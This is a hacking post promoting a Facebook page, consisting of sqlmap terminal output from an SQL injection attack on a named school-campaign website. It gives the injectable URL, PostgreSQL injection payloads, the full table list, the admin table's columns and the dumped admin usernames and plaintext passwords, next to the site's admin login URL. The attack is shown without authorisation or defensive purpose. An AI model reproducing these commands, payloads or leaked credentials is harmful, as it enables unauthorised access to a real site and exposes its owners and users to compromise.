---------------------------------- Like our facebook page for more ------------------------------------------------ _________________________________-- www.facebook.com/hacking.fever.7 --___________________________________________--- Login Panel--- http://www.savestiperstonesschool.co.uk/admin/ password at bottom :) available databases [3]: [*] information_schema [*] pg_catalog [*] public [04:14:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk' [*] shutting down at 04:14:08 root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public --tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 04:16:09 [04:16:09] [INFO] resuming back-end DBMS 'postgresql' [04:16:09] [INFO] testing connection to the target URL [04:16:10] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: PostgreSQL OR error-based - WHERE or HAVING clause Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY Type: AND/OR time-based blind Title: PostgreSQL OR time-based blind (heavy query) Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco --- [04:16:10] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux CentOS 5.8 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: PostgreSQL [04:16:10] [INFO] fetching tables for database: 'public' [04:16:12] [WARNING] reflective value(s) found and filtering out [04:16:14] [INFO] the SQL query used returns 218 entries [04:16:16] [INFO] retrieved: vendorauditrecord [04:16:17] [INFO] retrieved: customervariablevalue [04:16:19] [INFO] retrieved: customerproductlist [04:16:20] [INFO] retrieved: customerproductlistproducts [04:16:22] [INFO] retrieved: supplieruservariablevalue [04:16:24] [INFO] retrieved: vendorcatalogueclasses [04:16:25] [INFO] retrieved: vendorclasses [04:16:27] [INFO] retrieved: vendorclasseselement [04:16:29] [INFO] retrieved: vendorcompetitor [04:16:30] [INFO] retrieved: vendorcontentpaymentmethodvariablevalue [04:16:32] [INFO] retrieved: vendordiscountplan [04:16:33] [INFO] retrieved: vendortransactionpaymentmethod [04:16:35] [INFO] retrieved: category [04:16:36] [INFO] retrieved: categorydescription [04:16:38] [INFO] retrieved: categoryimage [04:16:39] [INFO] retrieved: contactmethod [04:16:41] [INFO] retrieved: customersecurity [04:16:42] [INFO] retrieved: pg_ts_cfg [04:16:44] [INFO] retrieved: pg_ts_cfgmap [04:16:45] [INFO] retrieved: pg_ts_dict [04:16:47] [INFO] retrieved: pg_ts_parser [04:16:48] [INFO] retrieved: account [04:16:50] [INFO] retrieved: accountvariablevalue [04:16:51] [INFO] retrieved: admingroupareaprivilege [04:16:53] [INFO] retrieved: admingroupdescription [04:16:54] [INFO] retrieved: admingroupuser [04:16:56] [INFO] retrieved: adminuseraccess [04:16:58] [INFO] retrieved: adminuser [04:17:00] [INFO] retrieved: adminuservariablevalue [04:17:02] [INFO] retrieved: definitionareaaddress [04:17:03] [INFO] retrieved: definitionareacountry [04:17:05] [INFO] retrieved: definitionareacounty [04:17:06] [INFO] retrieved: definitionareapostcode [04:17:08] [INFO] retrieved: definitionareaposttown [04:17:09] [INFO] retrieved: definitionarearegion [04:17:11] [INFO] retrieved: definitionareasublocation [04:17:12] [INFO] retrieved: productassociate [04:17:14] [INFO] retrieved: definitioncountry [04:17:16] [INFO] retrieved: customer [04:17:17] [INFO] retrieved: customeraddress [04:17:19] [INFO] retrieved: customerdiscount [04:17:20] [INFO] retrieved: customerpayment [04:17:22] [INFO] retrieved: definitioncurrency [04:17:23] [INFO] retrieved: definitionpaymentmethod [04:17:25] [INFO] retrieved: producttypevariableoption [04:17:26] [INFO] retrieved: producttypevariable [04:17:28] [INFO] retrieved: definitionroutinevariablevalue [04:17:29] [INFO] retrieved: definitionsecurityquestions [04:17:31] [INFO] retrieved: definitiontitletype [04:17:32] [INFO] retrieved: definitiondiscountplan [04:17:34] [INFO] retrieved: definitiondiscountplanvariablevalue [04:17:35] [INFO] retrieved: admingroup [04:17:37] [INFO] retrieved: customercontactmethod [04:17:38] [INFO] retrieved: definitionmarkup [04:17:40] [INFO] retrieved: definitionmarkupvariablevalue [04:17:42] [INFO] retrieved: merchant [04:17:43] [INFO] retrieved: definitionpaymentinterface [04:17:45] [INFO] retrieved: definitionpaymentinterfacevariablevalue [04:17:47] [INFO] retrieved: definitionpaymentmethodvariablevalue [04:17:49] [INFO] retrieved: product [04:17:51] [INFO] retrieved: productdescription [04:17:53] [INFO] retrieved: productdiscount [04:17:55] [INFO] retrieved: productfile [04:17:57] [INFO] retrieved: productimage [04:17:59] [INFO] retrieved: productitemdescription [04:18:01] [INFO] retrieved: productitemfile [04:18:04] [INFO] retrieved: productitemimage [04:18:06] [INFO] retrieved: productvariable [04:18:08] [INFO] retrieved: productvariableoption [04:18:10] [INFO] retrieved: productvariablevalue [04:18:12] [INFO] retrieved: definitionroutine [04:18:14] [INFO] retrieved: routine [04:18:16] [INFO] retrieved: routinevariablevalue [04:18:17] [INFO] retrieved: definitionsummary [04:18:19] [INFO] retrieved: supplierdeliveryzoneareacountry [04:18:22] [INFO] retrieved: supplierdeliveryzoneareacounty [04:18:23] [INFO] retrieved: supplierdeliveryzoneareaposttown [04:18:26] [INFO] retrieved: supplierdeliveryzonearearegion [04:18:27] [INFO] retrieved: supplierdeliveryzoneareasublocation [04:18:29] [INFO] retrieved: supplierdeliveryzoneoption [04:18:31] [INFO] retrieved: supplierdeliveryzoneoptionvariablevalue [04:18:33] [INFO] retrieved: supplierdeliveryzonecountry [04:18:35] [INFO] retrieved: supplierdeliveryzone [04:18:37] [INFO] retrieved: supplier [04:18:40] [INFO] retrieved: supplierdeliveryzoneoptionconstraint [04:18:42] [INFO] retrieved: supplierdeliveryzoneoptionpricebreak [04:18:44] [INFO] retrieved: supplierdeliveryzoneoptionpricebreakelement [04:18:46] [INFO] retrieved: supplierroutine [04:18:48] [INFO] retrieved: supplierdeliverycountrytaxrate [04:18:49] [INFO] retrieved: suppliertransactioncustomeraddress [04:18:51] [INFO] retrieved: suppliertransactioncustomer [04:18:53] [INFO] retrieved: suppliertransactioncustomerpayment [04:18:55] [INFO] retrieved: suppliertransactiondeliveryzoneoptionvariablevalue [04:18:57] [INFO] retrieved: suppliertransactiondeliveryzonecountry [04:18:59] [INFO] retrieved: suppliertransactiondeliveryzone [04:19:01] [INFO] retrieved: suppliertransactiondeliveryzoneoptionconstraint [04:19:03] [INFO] retrieved: suppliertransactiondeliveryzoneoption [04:19:05] [INFO] retrieved: suppliertransactiondeliveryzoneoptionpricebreak [04:19:07] [INFO] retrieved: suppliertransactionmaster [04:19:10] [INFO] retrieved: suppliertransactiondeliveryzoneoptionpricebreakelement [04:19:12] [INFO] retrieved: suppliertransactionpart [04:19:14] [INFO] retrieved: suppliertransactionvariablevalue [04:19:16] [INFO] retrieved: supplieruser [04:19:18] [INFO] retrieved: suppliervariablevalue [04:19:20] [INFO] retrieved: definitiontaxcode [04:19:22] [INFO] retrieved: definitiontemplate [04:19:24] [INFO] retrieved: vendorcurrency [04:19:26] [INFO] retrieved: vendordeliveryzonecountryarea [04:19:28] [INFO] retrieved: vendordeliveryzonecountry [04:19:30] [INFO] retrieved: vendordeliverycountrytaxrate [04:19:32] [INFO] retrieved: vendordeliveryzoneoption [04:19:34] [INFO] retrieved: vendordeliveryzoneoptionvariablevalue [04:19:36] [INFO] retrieved: vendordeliveryzone [04:19:38] [INFO] retrieved: vendor [04:19:40] [INFO] retrieved: vendorinterfacevariablevalue [04:19:42] [INFO] retrieved: vendordeliveryzoneoptionconstraint [04:19:46] [INFO] retrieved: vendordeliveryzoneoptionpricebreak [04:19:47] [INFO] retrieved: vendordeliveryzoneoptionpricebreakelement [04:19:49] [INFO] retrieved: vendorpaymentinterface [04:19:51] [INFO] retrieved: vendorpaymentinterfacevariablevalue [04:19:53] [INFO] retrieved: vendorroutine [04:19:55] [INFO] retrieved: vendorsupplier [04:19:57] [INFO] retrieved: vendorsuppliermarkup [04:19:59] [INFO] retrieved: vendorsupplierproductitemmarkup [04:20:02] [INFO] retrieved: vendortransactioncustomeraddress [04:20:03] [INFO] retrieved: vendortransactioncustomer [04:20:06] [INFO] retrieved: vendortransactioncustomerpayment [04:20:08] [INFO] retrieved: vendortransactiondeliveryzoneoptionvariablevalue [04:20:10] [INFO] retrieved: vendortransactiondeliveryzonecountry [04:20:12] [INFO] retrieved: vendortransactiondeliveryzone [04:20:13] [INFO] retrieved: vendortransactiondeliveryzoneoptionconstraint [04:20:16] [INFO] retrieved: vendortransactiondeliveryzoneoption [04:20:18] [INFO] retrieved: vendortransactiondeliveryzoneoptionpricebreak [04:20:20] [INFO] retrieved: vendortransactionmaster [04:20:22] [INFO] retrieved: vendortransactiondeliveryzoneoptionpricebreakelement [04:20:24] [INFO] retrieved: vendortransactionpart [04:20:26] [INFO] retrieved: vendortransactionproductdescription [04:20:28] [INFO] retrieved: vendortransactionproduct [04:20:30] [INFO] retrieved: vendortransactionproductvariable [04:20:32] [INFO] retrieved: vendortransactionproductvariablevalue [04:20:34] [INFO] retrieved: vendortransactionvariablevalue [04:20:35] [INFO] retrieved: vendoruser [04:20:37] [INFO] retrieved: vendorvariablevalue [04:20:39] [INFO] retrieved: productitem [04:20:41] [INFO] retrieved: productitemvariablevalue [04:20:43] [INFO] retrieved: producttype [04:20:46] [INFO] retrieved: suppliercataloguedescription [04:20:47] [INFO] retrieved: suppliercatalogue [04:20:50] [INFO] retrieved: suppliercatalogueimage [04:20:51] [INFO] retrieved: suppliercataloguevariablevalue [04:20:53] [INFO] retrieved: suppliertransactionproductitembuyprice [04:20:55] [INFO] retrieved: suppliertransactionproductitemfulfilment [04:20:57] [INFO] retrieved: suppliertransactionproductitemfulfilmentvariablevalue [04:20:59] [INFO] retrieved: suppliertransactionproductitemprice [04:21:01] [INFO] retrieved: suppliertransactionproductitem [04:21:03] [INFO] retrieved: vendorcataloguedescription [04:21:06] [INFO] retrieved: vendorcatalogue [04:21:09] [INFO] retrieved: vendorcatalogueimage [04:21:10] [INFO] retrieved: vendorcataloguevariablevalue [04:21:13] [INFO] retrieved: vendorcataloguevisibility [04:21:15] [INFO] retrieved: vendorcontentcurrencies [04:21:16] [INFO] retrieved: vendorcontentdescription [04:21:18] [INFO] retrieved: vendorcontentfile [04:21:20] [INFO] retrieved: vendorcontent [04:21:22] [INFO] retrieved: vendorcontentimage [04:21:24] [INFO] retrieved: vendorcontentpaymentmethod [04:21:26] [INFO] retrieved: vendorcontentpaymentmethodinterestplan [04:21:28] [INFO] retrieved: vendorcontentvariablevalue [04:21:30] [INFO] retrieved: vendorproductitem [04:21:32] [INFO] retrieved: vendortransactionproductitem [04:21:34] [INFO] retrieved: vendortransactionproductitemvariablevalue [04:21:36] [INFO] retrieved: vendortransactionsupplierproductitembuyprice [04:21:38] [INFO] retrieved: vendortransactionsupplierproductitemfulfilment [04:21:39] [INFO] retrieved: vendortransactionsupplierproductitemfulfilmentvariablevalue [04:21:41] [INFO] retrieved: vendortransactionsupplierproductitemprice [04:21:43] [INFO] retrieved: vendortransactionsupplierproductitem [04:21:46] [INFO] retrieved: vendortransactiondeliverycountrytaxrate [04:21:47] [INFO] retrieved: supplierproductitem [04:21:49] [INFO] retrieved: supplierproductitemprice [04:21:50] [INFO] retrieved: supplierproductitemvariablevalue [04:21:52] [INFO] retrieved: suppliertransactionproductitemvariablevalue [04:21:54] [INFO] retrieved: vendorcontentpaymentmethodimage [04:21:56] [INFO] retrieved: keyword_0 [04:21:57] [INFO] retrieved: keyword_1 [04:21:59] [INFO] retrieved: keyword_2 [04:22:01] [INFO] retrieved: keyword_3 [04:22:02] [INFO] retrieved: keyword_4 [04:22:04] [INFO] retrieved: keyword_5 [04:22:06] [INFO] retrieved: keyword_6 [04:22:08] [INFO] retrieved: keyword_7 [04:22:11] [INFO] retrieved: keyword_8 [04:22:14] [INFO] retrieved: keyword_9 [04:22:17] [INFO] retrieved: keyword_a [04:22:21] [INFO] retrieved: keyword_b [04:22:25] [INFO] retrieved: keyword_c [04:22:30] [INFO] retrieved: keyword_d [04:22:38] [INFO] retrieved: keyword_e [04:22:41] [INFO] retrieved: keyword_f [04:22:47] [INFO] retrieved: keyword_g [04:22:52] [INFO] retrieved: keyword_h [04:22:57] [INFO] retrieved: keyword_i [04:23:02] [INFO] retrieved: keyword_j [04:23:20] [INFO] retrieved: keyword_k [04:23:28] [INFO] retrieved: keyword_l [04:23:34] [INFO] retrieved: keyword_m [04:23:42] [INFO] retrieved: keyword_n [04:23:49] [INFO] retrieved: keyword_o [04:23:54] [INFO] retrieved: keyword_p [04:23:58] [INFO] retrieved: keyword_q [04:24:03] [INFO] retrieved: keyword_r [04:24:07] [INFO] retrieved: keyword_s [04:24:13] [INFO] retrieved: keyword_t [04:24:18] [INFO] retrieved: keyword_u [04:24:24] [INFO] retrieved: keyword_v [04:24:29] [INFO] retrieved: keyword_w [04:24:34] [INFO] retrieved: keyword_x [04:24:39] [INFO] retrieved: keyword_y [04:24:44] [INFO] retrieved: keyword_z Database: public [218 tables] +-------------------------------------------------------------+ | routine | | account | | accountvariablevalue | | admingroup | | admingroupareaprivilege | | admingroupdescription | | admingroupuser | | adminuser | | adminuseraccess | | adminuservariablevalue | | category | | categorydescription | | categoryimage | | contactmethod | | customer | | customeraddress | | customercontactmethod | | customerdiscount | | customerpayment | | customerproductlist | | customerproductlistproducts | | customersecurity | | customervariablevalue | | definitionareaaddress | | definitionareacountry | | definitionareacounty | | definitionareapostcode | | definitionareaposttown | | definitionarearegion | | definitionareasublocation | | definitioncountry | | definitioncurrency | | definitiondiscountplan | | definitiondiscountplanvariablevalue | | definitionmarkup | | definitionmarkupvariablevalue | | definitionpaymentinterface | | definitionpaymentinterfacevariablevalue | | definitionpaymentmethod | | definitionpaymentmethodvariablevalue | | definitionroutine | | definitionroutinevariablevalue | | definitionsecurityquestions | | definitionsummary | | definitiontaxcode | | definitiontemplate | | definitiontitletype | | keyword_0 | | keyword_1 | | keyword_2 | | keyword_3 | | keyword_4 | | keyword_5 | | keyword_6 | | keyword_7 | | keyword_8 | | keyword_9 | | keyword_a | | keyword_b | | keyword_c | | keyword_d | | keyword_e | | keyword_f | | keyword_g | | keyword_h | | keyword_i | | keyword_j | | keyword_k | | keyword_l | | keyword_m | | keyword_n | | keyword_o | | keyword_p | | keyword_q | | keyword_r | | keyword_s | | keyword_t | | keyword_u | | keyword_v | | keyword_w | | keyword_x | | keyword_y | | keyword_z | | merchant | | pg_ts_cfg | | pg_ts_cfgmap | | pg_ts_dict | | pg_ts_parser | | product | | productassociate | | productdescription | | productdiscount | | productfile | | productimage | | productitem | | productitemdescription | | productitemfile | | productitemimage | | productitemvariablevalue | | producttype | | producttypevariable | | producttypevariableoption | | productvariable | | productvariableoption | | productvariablevalue | | routinevariablevalue | | supplier | | suppliercatalogue | | suppliercataloguedescription | | suppliercatalogueimage | | suppliercataloguevariablevalue | | supplierdeliverycountrytaxrate | | supplierdeliveryzone | | supplierdeliveryzoneareacountry | | supplierdeliveryzoneareacounty | | supplierdeliveryzoneareaposttown | | supplierdeliveryzonearearegion | | supplierdeliveryzoneareasublocation | | supplierdeliveryzonecountry | | supplierdeliveryzoneoption | | supplierdeliveryzoneoptionconstraint | | supplierdeliveryzoneoptionpricebreak | | supplierdeliveryzoneoptionpricebreakelement | | supplierdeliveryzoneoptionvariablevalue | | supplierproductitem | | supplierproductitemprice | | supplierproductitemvariablevalue | | supplierroutine | | suppliertransactioncustomer | | suppliertransactioncustomeraddress | | suppliertransactioncustomerpayment | | suppliertransactiondeliveryzone | | suppliertransactiondeliveryzonecountry | | suppliertransactiondeliveryzoneoption | | suppliertransactiondeliveryzoneoptionconstraint | | suppliertransactiondeliveryzoneoptionpricebreak | | suppliertransactiondeliveryzoneoptionpricebreakelement | | suppliertransactiondeliveryzoneoptionvariablevalue | | suppliertransactionmaster | | suppliertransactionpart | | suppliertransactionproductitem | | suppliertransactionproductitembuyprice | | suppliertransactionproductitemfulfilment | | suppliertransactionproductitemfulfilmentvariablevalue | | suppliertransactionproductitemprice | | suppliertransactionproductitemvariablevalue | | suppliertransactionvariablevalue | | supplieruser | | supplieruservariablevalue | | suppliervariablevalue | | vendor | | vendorauditrecord | | vendorcatalogue | | vendorcatalogueclasses | | vendorcataloguedescription | | vendorcatalogueimage | | vendorcataloguevariablevalue | | vendorcataloguevisibility | | vendorclasses | | vendorclasseselement | | vendorcompetitor | | vendorcontent | | vendorcontentcurrencies | | vendorcontentdescription | | vendorcontentfile | | vendorcontentimage | | vendorcontentpaymentmethod | | vendorcontentpaymentmethodimage | | vendorcontentpaymentmethodinterestplan | | vendorcontentpaymentmethodvariablevalue | | vendorcontentvariablevalue | | vendorcurrency | | vendordeliverycountrytaxrate | | vendordeliveryzone | | vendordeliveryzonecountry | | vendordeliveryzonecountryarea | | vendordeliveryzoneoption | | vendordeliveryzoneoptionconstraint | | vendordeliveryzoneoptionpricebreak | | vendordeliveryzoneoptionpricebreakelement | | vendordeliveryzoneoptionvariablevalue | | vendordiscountplan | | vendorinterfacevariablevalue | | vendorpaymentinterface | | vendorpaymentinterfacevariablevalue | | vendorproductitem | | vendorroutine | | vendorsupplier | | vendorsuppliermarkup | | vendorsupplierproductitemmarkup | | vendortransactioncustomer | | vendortransactioncustomeraddress | | vendortransactioncustomerpayment | | vendortransactiondeliverycountrytaxrate | | vendortransactiondeliveryzone | | vendortransactiondeliveryzonecountry | | vendortransactiondeliveryzoneoption | | vendortransactiondeliveryzoneoptionconstraint | | vendortransactiondeliveryzoneoptionpricebreak | | vendortransactiondeliveryzoneoptionpricebreakelement | | vendortransactiondeliveryzoneoptionvariablevalue | | vendortransactionmaster | | vendortransactionpart | | vendortransactionpaymentmethod | | vendortransactionproduct | | vendortransactionproductdescription | | vendortransactionproductitem | | vendortransactionproductitemvariablevalue | | vendortransactionproductvariable | | vendortransactionproductvariablevalue | | vendortransactionsupplierproductitem | | vendortransactionsupplierproductitembuyprice | | vendortransactionsupplierproductitemfulfilment | | vendortransactionsupplierproductitemfulfilmentvariablevalue | | vendortransactionsupplierproductitemprice | | vendortransactionvariablevalue | | vendoruser | | vendorvariablevalue | +-------------------------------------------------------------+ [04:24:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk' [*] shutting down at 04:24:44 root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public -T adminuser --columns sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 04:25:47 [04:25:47] [INFO] resuming back-end DBMS 'postgresql' [04:25:48] [INFO] testing connection to the target URL [04:25:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: PostgreSQL OR error-based - WHERE or HAVING clause Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY Type: AND/OR time-based blind Title: PostgreSQL OR time-based blind (heavy query) Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco --- [04:25:55] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux CentOS 5.8 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: PostgreSQL [04:25:55] [INFO] fetching columns for table 'adminuser' in database 'public' [04:25:57] [WARNING] reflective value(s) found and filtering out [04:26:01] [INFO] the SQL query used returns 8 entries [04:26:05] [INFO] retrieved: username [04:26:08] [INFO] retrieved: varchar [04:26:10] [INFO] retrieved: userpassword [04:26:12] [INFO] retrieved: varchar [04:26:14] [INFO] retrieved: initials [04:26:16] [INFO] retrieved: varchar [04:26:18] [INFO] retrieved: surname [04:26:20] [INFO] retrieved: varchar [04:26:22] [INFO] retrieved: prompts [04:26:24] [INFO] retrieved: varchar [04:26:26] [INFO] retrieved: email [04:26:28] [INFO] retrieved: varchar [04:26:33] [INFO] retrieved: theme [04:26:37] [INFO] retrieved: varchar [04:26:39] [INFO] retrieved: resultslength [04:26:42] [INFO] retrieved: varchar Database: public Table: adminuser [8 columns] +---------------+---------+ | Column | Type | +---------------+---------+ | email | varchar | | initials | varchar | | prompts | varchar | | resultslength | varchar | | surname | varchar | | theme | varchar | | username | varchar | | userpassword | varchar | +---------------+---------+ [04:26:42] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk' [*] shutting down at 04:26:42 root@kali:~# sqlmap -u http://www.savestiperstonesschool.co.uk/page/index.php?id=photo-galleries_grand-parent%27s-day -D public -T adminuser -C username,userpassword --dump sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 04:27:31 [04:27:31] [INFO] resuming back-end DBMS 'postgresql' [04:27:31] [INFO] testing connection to the target URL [04:27:33] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: error-based Title: PostgreSQL OR error-based - WHERE or HAVING clause Payload: id=-8865' OR 2447=CAST((CHR(113)||CHR(117)||CHR(103)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (2447=2447) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(97)||CHR(103)||CHR(113)) AS NUMERIC) AND 'KHEY'='KHEY Type: AND/OR time-based blind Title: PostgreSQL OR time-based blind (heavy query) Payload: id=-7585' OR 2388=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'nTco'='nTco --- [04:27:33] [INFO] the back-end DBMS is PostgreSQL web server operating system: Linux CentOS 5.8 web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: PostgreSQL [04:27:33] [INFO] fetching columns 'username, userpassword' for table 'adminuser' in database 'public' [04:27:35] [WARNING] reflective value(s) found and filtering out [04:27:37] [INFO] the SQL query used returns 2 entries [04:27:40] [INFO] retrieved: username [04:27:42] [INFO] retrieved: varchar [04:27:45] [INFO] retrieved: userpassword [04:27:47] [INFO] retrieved: varchar [04:27:47] [INFO] fetching entries of column(s) 'username, userpassword' for table 'adminuser' in database 'public' [04:27:49] [INFO] the SQL query used returns 2 entries [04:27:52] [INFO] retrieved: staff [04:27:56] [INFO] retrieved: 8933127 [04:28:01] [INFO] retrieved: sws [04:28:05] [INFO] retrieved: eastb0urne [04:28:05] [INFO] analyzing table dump for possible password hashes Database: public Table: adminuser [2 entries] +----------+--------------+ | username | userpassword | +----------+--------------+ | staff | 8933127 | | sws | eastb0urne | +----------+--------------+ [04:28:05] [INFO] table 'public.adminuser' dumped to CSV file '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk/dump/public/adminuser.csv' [04:28:05] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.savestiperstonesschool.co.uk' [*] shutting down at 04:28:05